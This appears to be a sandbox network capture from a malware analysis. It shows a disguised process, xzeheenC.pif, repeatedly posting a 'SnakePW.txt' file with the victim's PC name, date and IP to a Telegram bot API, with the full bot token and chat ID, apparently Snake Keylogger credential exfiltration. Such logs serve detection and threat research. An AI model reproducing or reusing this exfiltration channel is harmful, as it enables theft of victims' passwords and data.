                                                                                                        2024-12-18 15:30:35 UTC1024INData Raw: 71 61 68 71 61 73 79 63 55 42 30 4e 34 4b 63 50 6b 79 52 4f 53 51 4b 79 46 2b 41 33 32 62 46 72 45 6c 6b 59 63 39 46 6a 4e 44 71 45 6b 38 6b 6c 67 37 66 35 6d 63 6c 75 78 72 73 4e 67 32 74 69 77 58 77 76 78 2f 7a 7a 44 6a 33 6c 6d 76 61 4f 63 6c 4c 65 46 68 4d 58 4b 75 66 4d 58 35 75 6a 2f 78 2f 30 44 63 56 72 38 69 45 79 50 79 79 44 53 79 44 61 4a 53 5a 6b 53 44 79 47 78 36 58 51 76 62 6c 66 6b 4e 6d 75 41 63 48 4b 30 58 58 53 71 37 57 6b 75 36 7a 6a 41 39 2b 64 54 45 6b 30 31 63 61 46 77 70 76 61 79 47 62 75 55 44 41 76 54 6a 6a 50 66 77 61 71 46 51 46 44 51 50 45 4e 4f 7a 61 65 68 4b 6b 53 36 64 48 78 4c 79 58 75 2b 64 56 4e 56 55 35 5a 47 43 6f 4a 48 30 67 79 50 45 6f 35 66 2f 4f 37 4f 55 2b 46 37 52 71 42 64 75 43 65 39 43 30 36 31 57 64 67 4c 55 51
                                                                                                        Data Ascii: qahqasycUB0N4KcPkyROSQKyF+A32bFrElkYc9FjNDqEk8klg7f5mcluxrsNg2tiwXwvx/zzDj3lmvaOclLeFhMXKufMX5uj/x/0DcVr8iEyPyyDSyDaJSZkSDyGx6XQvblfkNmuAcHK0XXSq7Wku6zjA9+dTEk01caFwpvayGbuUDAvTjjPfwaqFQFDQPENOzaehKkS6dHxLyXu+dVNVU5ZGCoJH0gyPEo5f/O7OU+F7RqBduCe9C061WdgLUQ


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.849712149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:30:50 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f091cadca
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:30:50 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 66 30 39 31 63 61 64 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f4f091cadcaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:30:50 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:30:50 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:30:50 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 35 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419020,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535850,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.849714149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:02 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f155e2696
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:02 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 66 31 35 35 65 32 36 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f4f155e2696Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:02 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:02 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:02 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 36 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419022,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535862,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.849716149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:03 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f1166fd31
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:31:03 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 66 31 31 36 36 66 64 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f4f1166fd31Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:04 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:04 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:04 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 36 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419024,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535864,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.849717149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:04 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f640271612d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:04 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 36 34 30 32 37 31 36 31 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f640271612dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:04 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:04 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:04 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 36 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419026,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535864,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.849718149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:06 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f7a41c14c84
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:06 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 37 61 34 31 63 31 34 63 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f7a41c14c84Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:06 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:06 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:06 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 36 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419028,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535866,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.849719149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:08 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f91d002431f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:08 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 39 31 64 30 30 32 34 33 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f91d002431fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:08 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:08 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:08 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 36 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419030,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535868,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.849721149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:10 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fa7e7d3e4d6
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:10 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 61 37 65 37 64 33 65 34 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fa7e7d3e4d6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:10 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
